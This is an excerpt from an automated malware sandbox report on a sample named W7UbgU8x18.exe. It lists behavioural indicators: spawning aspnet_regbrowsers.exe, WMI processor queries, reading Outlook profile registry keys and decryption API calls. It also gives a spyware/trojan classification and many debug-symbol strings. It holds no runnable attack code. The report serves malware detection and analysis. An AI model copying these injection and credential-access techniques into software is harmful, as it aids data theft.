                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02724770
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272476B
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272D518
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D0F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0169B748
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01696BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B33F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B8960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01824800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_018281C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01824710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0182D6D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646059E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646B208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464B88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06469908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064676B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646E588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064653D0
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilename vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuaAFllYGbTewxRVnYOHBNjJG.exe4 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.301512168.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.302293725.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamefixedhost.dll0 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeVirustotal: Detection: 35%
                      Source: W7UbgU8x18.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile read: C:\Users\user\Desktop\W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\W7UbgU8x18.exe "C:\Users\user\Desktop\W7UbgU8x18.exe"
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@1/2
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1768:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: W7UbgU8x18.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb""9s source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.270613865.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270476484.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.283477132.000000000501C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270533710.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271835064.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270427827.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb, source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb6 source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: fixedhost.pdb\ source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3|n source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb source: W7UbgU8x18.exe
                      Source: Binary string: fixedhost.pdbMZ@ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Z.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb* source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb4 source: WER343.tmp.dmp.10.dr
                      Source: Binary string: mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Windows\tuneraidfix.pdbpdbfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdbP source: W7UbgU8x18.exe, 00000000.00000000.256076792.0000000000C18000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.302604429.0000000000C18000.00000004.00000020.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\user\Desktop\W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbW source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER343.tmp.dmp.10.dr
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbK source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
